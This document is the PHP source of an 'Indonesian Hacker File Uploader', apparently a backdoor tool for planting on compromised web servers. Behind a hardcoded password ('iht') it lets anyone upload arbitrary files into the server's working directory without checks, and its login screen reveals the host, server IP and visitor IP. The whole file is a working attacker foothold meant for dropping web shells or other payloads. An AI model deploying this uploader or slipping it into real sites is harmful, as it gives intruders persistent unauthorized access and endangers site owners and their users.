Code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <link rel="shortcut icon" href="http://www.indonesianhacker.or.id/favicon.gif" type="image/x-icon"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Indonesian Hacker | File Uploader</title> <link href="style/style.css" rel="stylesheet" type="text/css" /> <?php @session_start(); @set_time_limit(0); //PASSWORD CONFIGURATION @$pass = $_POST['pass']; $chk_login = true; $password = "iht"; //END CONFIGURATION if($pass == $password) { $_SESSION['nst'] = "$pass"; } if($chk_login == true) { if(!isset($_SESSION['nst']) or $_SESSION['nst'] != $password) { die(" <center> <br><br><br><br> <table border=0 cellpadding=0 cellspacing=0 width=100% height=100%> <tr><td valign=middle align=center> <table width=100 bgcolor=black border=6 bordercolor=#444444> <tr><td> <font size=1 face=verdana><center> <b></font></a><br></b> </center> <form method=post> <font size=1 face=verdana color=red><strong><center>Indonesian-Hacker|File-Uploader</center></strong><br> <input type=password name=pass size=30> </form> <b>Host:</b> ".$_SERVER["HTTP_HOST"]."<br> <b>IP:</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br> <b>Your ip:</b> ".$_SERVER["REMOTE_ADDR"]." </td></tr></table> </td></tr></table> "); } } ?> <center> <br><br><br><br> <?php $myUpload = new maxUpload(); //$myUpload->setUploadLocation(getcwd().DIRECTORY_SEPARATOR); $myUpload->uploadFile(); ?> <?php /************************************************* * Edit By p4r46hcyb3rn3t * * Version: 1.0 * Date: 2009-09-29 * ****************************************************/ class maxUpload{ var $uploadLocation; /** * Constructor to initialize class varaibles * The uploadLocation will be set to the actual * working directory * * @return maxUpload */ function maxUpload(){ $this->uploadLocation = getcwd().DIRECTORY_SEPARATOR; } /** * This function sets the directory where to upload the file * In case of Windows server use the form: c:\\temp\\ * In case of Unix server use the form: /tmp/ * * @param String Directory where to store the files */ function setUploadLocation($dir){ $this->uploadLocation = $dir; } function showUploadForm($msg='',$error=''){ ?> <div id="container"> <div id="header"><img src="http://www.indonesianhacker.or.id/images/misc/default.jpg" border="0" alt="IHT"/></div> <div id="header_main"><b>Indonesian Hacker File Uploader</div></div> <div id="content"> <?php if ($msg != ''){ echo '<p class="msg">'.$msg.'</p>'; } else if ($error != ''){ echo '<p class="emsg">'.$error.'</p>'; } ?> <form action="" method="post" enctype="multipart/form-data" > <center> <label>File: <input name="myfile" type="file" size="30" /> </label> <label> <input type="submit" name="submitBtn" class="sbtn" value="Upload" /> </label> </center> </form> </div> <?php } function uploadFile(){ if (!isset($_POST['submitBtn'])){ $this->showUploadForm(); } else { $msg = ''; $error = ''; //Check destination directory if (!file_exists($this->uploadLocation)){ $error = "The target directory doesn't exists!"; } else if (!is_writeable($this->uploadLocation)) { $error = "The target directory is not writeable!"; } else { $target_path = $this->uploadLocation . basename( $_FILES['myfile']['name']); if(@move_uploaded_file($_FILES['myfile']['tmp_name'], $target_path)) { $msg = basename( $_FILES['myfile']['name']). " was uploaded successfully!"; } else{ $error = "The upload process failed!"; } } $this->showUploadForm($msg,$error); } } } ?> </center> </body>